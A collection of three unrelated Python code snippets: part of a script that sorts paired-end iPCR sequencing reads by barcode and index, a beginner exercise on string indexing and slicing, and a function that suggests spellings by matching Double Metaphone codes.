        # in the dictionary so that the reads are written to the
        # proper file.
        outfiles = {
            'TCT': outf1,
            'GCT': outf1,
            'ACT': outf1,
            'ACG': outf2,
            'AGG': outf2,
            'CCG': outf2,
        }
        with gzopen(fname_iPCR_PE1) as f, gzopen(fname_iPCR_PE2) as g:
            for lineno, (line1, line2) in enumerate(izip(f, g)):
                # Take sequence lines of the fastq files.
                if lineno % 4 != 1: continue
                brcd = trimSuffix(matcher, line1)
                # If we find a barcode between 13 and 25 nucleotides
                # then the scarcode must have been the right one.
                if len(brcd) < 13 or len(brcd) > 25: continue
                # Remove first 25 nucleotides.
                suff = line2.rstrip()[25:].split('CATG')[0]
                # Cut genome fragment after the first CATG.
                genome = re.sub(r'CATG.*', 'CATG', suff)
                # Avoid short strings that are unmappable.
                if len(genome) < 20:
                    genome = 'gatcctgatgctagtgactgatgagctgctgaagctgga'
                # The first 3 nucleotides of the reverse read are the
                # index. Check that it belongs to the right group.
                idx = line2[:3]
                if idx in outfiles:
                    outfiles[idx].write('>%s\n%s\n' % (brcd, genome))
if __name__ == '__main__':
    # CLI: first argument is the PE1 fastq(.gz) path, second the PE2 path.
    extract_reads_from_PE_fastq(sys.argv[1], sys.argv[2])
|
# 01234567890123
# (index ruler for the characters of the string below)
parrot = "Norwegian Blue"
print(parrot)
# Positive indexing: 0-based offsets from the start.
print(parrot[3])
print(parrot[4])
print(parrot[9])
print(parrot[3])
print(parrot[6])
print(parrot[8])
# Negative indexing: offsets from the end (-1 is the last character).
print(parrot[-5])
print(parrot[-11])
print(parrot[-10])
print(parrot[-5])
print(parrot[-11])
print(parrot[-8])
print(parrot[-6])
# Slicing: [start:stop] is half-open; omitted bounds default to the ends.
print(parrot[0:6])
print(parrot[:6] + parrot[6:])
print(parrot[-4:12])
# A step of 2 takes every other character in the slice.
print(parrot[0:6:2])
# Every 4th character starting at index 1 picks out the separator symbols.
number = "9,223;372:036 854,775;807"
seperators = number[1::4]
print(seperators)
# Replace each separator with a space, then split into the numeric groups.
values = "".join(char if char not in seperators else " " for char in number).split()
print([int(val) for val in values])
|
import metaphone
def plausibleWords(incorrectWord):
    """Return dictionary words whose primary Double Metaphone code matches
    that of *incorrectWord*.

    Looks the code up in precomputed phonetic files whose line numbers
    correspond, line for line, to the word lists enUS.txt / enGB.txt
    (assumed layout — confirm against the generator of these files).
    """
    target = metaphone.dm(incorrectWord)[0]
    # (line number, dialect) pairs whose phonetic code matches the target.
    # Fix: all four files were previously opened and never closed; each is
    # now read inside a with-block. enumerate replaces the manual counters
    # and the py2-only xrange loop.
    matches = []
    with open("metaphonicDictUS.txt", "r") as phoneticDictUS:
        for lineno, line in enumerate(phoneticDictUS):
            if line[:-1] == target:
                matches.append((lineno, "USprimary"))
    with open("metaphonicDictGB.txt", "r") as phoneticDictGB:
        for lineno, line in enumerate(phoneticDictGB):
            if line[:-1] == target:
                matches.append((lineno, "GBprimary"))
    with open("enUS.txt", "r") as USengDict:
        linesUS = USengDict.readlines()
    with open("enGB.txt", "r") as GBengDict:
        linesGB = GBengDict.readlines()
    plausibleList = []
    for lineno, dialect in matches:
        source = linesUS if dialect == "USprimary" else linesGB
        plausibleList.append(source[lineno][:-1])
    return plausibleList
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.